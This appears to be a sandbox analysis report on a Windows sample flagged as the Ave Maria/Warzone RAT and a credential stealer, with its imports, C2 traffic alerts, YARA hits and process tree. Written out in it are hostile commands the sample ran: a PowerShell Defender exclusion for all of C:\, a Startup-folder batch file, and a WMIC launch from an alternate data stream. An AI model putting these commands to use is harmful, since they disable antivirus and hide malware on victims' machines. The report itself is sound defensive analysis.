                        RT_VERSION0x1549c40x314dataEnglishUnited States
                        RT_MANIFEST0x154cdc0x17dXML 1.0 document textEnglishUnited States

                        Imports

                        DLLImport
                        ADVAPI32.dllAccessCheck
                        GDI32.dllGetTextExtentPoint32A
                        KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                        ole32.dllCoInitialize
                        OLEAUT32.dllSysFreeString
                        SHELL32.dllSHGetFileInfoA
                        USER32.dllGetDC

                        Version Infos

                        DescriptionData
                        LegalCopyright Microsoft Corporation. All rights reserved.
                        InternalNameATLDUCK
                        FileVersion1, 0, 0, 1
                        CompanyName
                        ProductNameatlduck Module
                        OLESelfRegister
                        ProductVersion1, 0, 0, 1
                        FileDescriptionatlduck Module
                        OriginalFilenameATLDUCK.DLL
                        Translation0x0409 0x04b0

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.2.323.227.202.1574974080802834979 05/22/22-12:33:29.604971TCP2834979ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin497408080192.168.2.323.227.202.157
                        23.227.202.157192.168.2.38080497402841903 05/22/22-12:33:29.434739TCP2841903ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)80804974023.227.202.157192.168.2.3

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        May 22, 2022 12:33:29.163681984 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:29.296467066 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:29.296816111 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:29.434739113 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:29.604970932 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:29.769226074 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:29.770284891 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:29.953881025 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:29.954632044 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.137533903 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.420416117 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.420444012 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.420460939 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.420485020 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.420510054 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.420609951 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.420645952 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.553220987 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553282976 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553324938 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553369045 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553412914 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.553426981 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553471088 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553472042 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.553512096 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553546906 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.553561926 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553594112 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.553661108 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.686826944 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.686891079 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.686939001 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.686978102 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687000036 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.687016964 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687046051 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.687060118 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687100887 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687140942 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687141895 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.687180996 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687217951 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687257051 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.687258959 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687273979 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.687299013 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687340021 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687412977 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.687418938 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687458038 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687479973 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.687499046 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687530994 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.687588930 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.820411921 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820503950 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820561886 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820605993 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.820616007 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820658922 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820702076 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820735931 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.820755959 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820768118 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.820805073 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820844889 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820872068 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.820894003 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820935965 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.820965052 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.820995092 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821037054 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821079969 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821100950 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821135044 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821176052 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821212053 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821228981 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821230888 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821276903 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821319103 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821356058 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821368933 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821409941 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821453094 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821477890 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821499109 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821541071 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821567059 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821594954 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821604013 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821641922 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821681976 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821716070 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821729898 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821770906 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821813107 CEST80804974023.227.202.157192.168.2.3
                        May 22, 2022 12:33:30.821840048 CEST497408080192.168.2.323.227.202.157
                        May 22, 2022 12:33:30.821858883 CEST80804974023.227.202.157192.168.2.3

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:12:33:06
                        Start date:22/05/2022
                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Lazy.175154.8129.exe"
                        Imagebase:0x400000
                        File size:222720 bytes
                        MD5 hash:DABC6F0C75C134E5310BA3526ADBA833
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252637221.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252571359.0000000000721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265319225.0000000002310000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252535333.0000000000725000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252587569.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000003.252517733.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low

                        General

                        Target ID:1
                        Start time:12:33:12
                        Start date:22/05/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:powershell Add-MpPreference -ExclusionPath C:\
                        Imagebase:0x1c0000
                        File size:430592 bytes
                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        General

                        Target ID:2
                        Start time:12:33:12
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:4
                        Start time:12:33:14
                        Start date:22/05/2022
                        Path:C:\ProgramData\images.exe
                        Wow64 process (32bit):true
                        Commandline:C:\ProgramData\images.exe
                        Imagebase:0x400000
                        File size:222720 bytes
                        MD5 hash:DABC6F0C75C134E5310BA3526ADBA833
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271102181.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.523218052.0000000002E2F000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.272602277.0000000000720000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.522785265.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271200281.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.271579326.0000000000747000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.523109048.0000000002CF4000.00000002.00001000.00020000.00000000.sdmp, Author: Joe Security
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 24%, ReversingLabs
                        Reputation:low

                        General

                        Target ID:6
                        Start time:12:33:22
                        Start date:22/05/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:powershell Add-MpPreference -ExclusionPath C:\
                        Imagebase:0x1c0000
                        File size:430592 bytes
                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:high

                        General

                        Target ID:7
                        Start time:12:33:24
                        Start date:22/05/2022
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat" "
                        Imagebase:0x7ff737520000
                        File size:273920 bytes
                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:8
                        Start time:12:33:25
                        Start date:22/05/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\cmd.exe
                        Imagebase:0xc20000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:9
                        Start time:12:33:25
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:10
                        Start time:12:33:25
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:12
                        Start time:12:33:26
                        Start date:22/05/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7c9170000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Target ID:13
                        Start time:12:33:26
                        Start date:22/05/2022
                        Path:C:\Windows\System32\wbem\WMIC.exe
                        Wow64 process (32bit):false
                        Commandline:wmic process call create '"C:\ProgramData:ApplicationData"'
                        Imagebase:0x7ff7431c0000
                        File size:521728 bytes
                        MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Target ID:22
                        Start time:12:33:44
                        Start date:22/05/2022
                        Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:30616 bytes
                        MD5 hash:0600DF60EF88FD10663EC84709E5E245
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        General

                        Target ID:23
                        Start time:12:33:44
                        Start date:22/05/2022
                        Path:C:\Windows\System32\drivers\rdpdr.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:182784 bytes
                        MD5 hash:52A6CC99F5934CFAE88353C47B6193E7
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language

                        General

                        Target ID:27
                        Start time:12:33:45
                        Start date:22/05/2022
                        Path:C:\Windows\System32\drivers\tsusbhub.sys
                        Wow64 process (32bit):
                        Commandline:
                        Imagebase:
                        File size:126464 bytes
                        MD5 hash:3A84A09CBC42148A0C7D00B3E82517F1
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language

                        General

                        Target ID:30
                        Start time:12:34:06
                        Start date:22/05/2022
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff674600000
                        File size:488448 bytes
                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        General

                        Target ID:41
                        Start time:12:35:04
                        Start date:22/05/2022
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff674600000
                        File size:488448 bytes
                        MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language

                        Disassembly

                        No disassembly